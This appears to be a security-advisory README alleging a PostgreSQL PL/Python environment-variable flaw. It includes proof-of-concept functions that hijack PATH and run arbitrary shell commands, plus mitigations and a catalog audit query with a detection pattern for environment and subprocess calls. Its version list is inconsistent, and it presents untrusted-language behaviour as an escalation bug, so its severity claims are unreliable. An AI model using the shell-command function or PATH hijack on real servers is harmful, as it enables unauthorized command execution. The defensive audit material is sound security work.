This repository documents a vulnerability identified in PostgreSQL versions 16.3, 17.1 and 17.2 that allows for unauthorized manipulation of environment variables using PL/Python functions. This issue can lead to unauthorized command execution, privilege escalation, and other potential security impacts.
Affected Products/Versions
Product: PostgreSQL
Versions Affected: 16.3, 17.1
Proof-of-Concept (PoC)
Steps to Reproduce
Connect to the PostgreSQL database as a user with permissions to create functions.
psql -U [username] -d [database_name]
Create a PL/Python function to modify the PATH environment variable:
CREATE FUNCTION test_env_python() RETURNS void AS $$
import os
# Prepend /tmp/test_bin so binaries placed there shadow the system ones
os.environ['PATH'] = '/tmp/test_bin:' + os.environ['PATH']
$$ LANGUAGE plpython3u;

SELECT test_env_python();
Verify the change by placing a custom ls script in /tmp/test_bin and executing it through PostgreSQL. Create a function that runs a shell command and invoke it:
CREATE FUNCTION run_shell_command(cmd TEXT) RETURNS void AS $$
import subprocess
subprocess.run(cmd, shell=True)
$$ LANGUAGE plpython3u;

SELECT run_shell_command('ls');
Expected Outcome
The custom ls script in /tmp/test_bin is executed instead of the system ls, demonstrating that environment variable manipulation allows for custom command execution.
Impact
This vulnerability enables:
Unauthorized Code Execution: An attacker with permissions to create functions may modify the environment and execute arbitrary commands.
Privilege Escalation: Depending on the privileges of the PostgreSQL user, an attacker may gain higher-level access or control over the underlying server.
Suggested Mitigations
- Restrict Permissions: Limit the creation of PL/Python and PL/Perl functions to trusted users only.
- Environment Variable Sanitization: Ensure that environment variables are properly sanitized and modifications are restricted.
- Upgrade PostgreSQL: If a fix is released by the PostgreSQL Global Development Group, update to the latest version.
- Audit Database Functions: Regularly audit user-created functions to detect and prevent potential exploitation.
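The audit step above, as an added example that is not part of the original report: a catalog query a DBA can run in psql to list every function written in an untrusted procedural language (plpython3u, plperlu and the like, which is where the PoC functions would appear), with its owner and whether that owner is a superuser, and to flag bodies that touch the process environment or spawn subprocesses. The regular expression is an assumption about what to look for, not a definitive signature.

```sql
-- Added audit query (not from the original report).
-- pg_language.lanispl marks procedural languages; lanpltrusted = false
-- marks the untrusted ones, whose functions run with the server's full
-- OS privileges. Joining pg_proc to pg_language and pg_roles shows who
-- owns such functions and what they contain.
SELECT n.nspname                          AS schema_name,
       p.proname                          AS function_name,
       pg_get_function_arguments(p.oid)   AS arguments,
       l.lanname                          AS language,
       r.rolname                          AS owner,
       r.rolsuper                         AS owner_is_superuser,
       -- Assumed heuristic: flag source that manipulates the environment
       -- or launches external processes, as the PoC functions do.
       p.prosrc ~* '(os\.environ|putenv|subprocess|os\.system|ENV\{)'
                                          AS touches_env_or_shell,
       left(p.prosrc, 200)                AS source_preview
FROM   pg_catalog.pg_proc      AS p
JOIN   pg_catalog.pg_language  AS l ON l.oid = p.prolang
JOIN   pg_catalog.pg_namespace AS n ON n.oid = p.pronamespace
JOIN   pg_catalog.pg_roles     AS r ON r.oid = p.proowner
WHERE  l.lanispl                       -- procedural languages only
  AND  NOT l.lanpltrusted              -- untrusted: plpython3u, plperlu, ...
  AND  n.nspname NOT IN ('pg_catalog', 'information_schema')
ORDER  BY touches_env_or_shell DESC, schema_name, function_name;

-- Companion check: which untrusted languages are installed at all, and
-- which roles could create functions in them (superusers).
SELECT l.lanname, l.lanpltrusted
FROM   pg_catalog.pg_language AS l
WHERE  l.lanispl AND NOT l.lanpltrusted;

SELECT rolname
FROM   pg_catalog.pg_roles
WHERE  rolsuper
ORDER  BY rolname;
```

Run the first query on a schedule (or from a monitoring job) and alert on any new row, since a legitimate application rarely needs new functions in an untrusted language.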